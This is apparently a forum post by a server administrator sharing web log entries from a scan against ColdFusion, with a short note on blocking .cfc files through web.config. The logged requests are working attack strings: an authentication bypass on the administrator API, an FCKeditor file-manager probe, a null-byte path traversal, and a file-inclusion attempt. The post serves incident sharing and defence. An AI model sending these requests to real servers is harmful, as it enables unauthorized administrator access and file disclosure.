More on this, its a scan for a hack attempt on the patches that were released earlier this year:
xxx.xxx.xxx.xxx GET /CFIDE/adminapi/administrator.cfc method=login&adminpassword=&rdsPasswordAllowed=true 80 - 77.247.181.165 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+6.0;+en)+Opera+9.50 - - 404 7 0 5381 227 249
xxx.xxx.xxx.xxx GET /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/conne ctor.cfm Command=GetFoldersAndFiles&Type=File&CurrentFolder=/ 80 - 77.247.181.165 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+6.0;+en)+Opera+9.50 - - 500 0 0 9449 272 405
xxx.xxx.xxx.xxx GET /CFIDE/Administrator/logging/settings.cfm locale=../../../../menu.js%00en 80 - 77.247.181.165 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+6.0;+en)+Opera+9.50 - - 200 0 0 9752 215 499
xxx.xxx.xxx.xxx GET /CFIDE/adminapi/customtags/l10n.cfm attributes.id=it&attributes.file=../../administrator/analyzer/index.c fm&attributes.locale=it&attributes.var=it&attributes.jscript=false&att ributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode= end&thisTag.generatedContent=htp 80 - 77.247.181.165 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+6.0;+en)+Opera+9.50 - - 500 0 0 8761 419 405
I took a suggested approach of using a web.config to deny .CFC from being executed by a web browser. It seems that the first call gives a user direct access to the administrator without having to authenticate (that was one of the fixes)... the rest are followup commands where they try to get access to the file manager and such.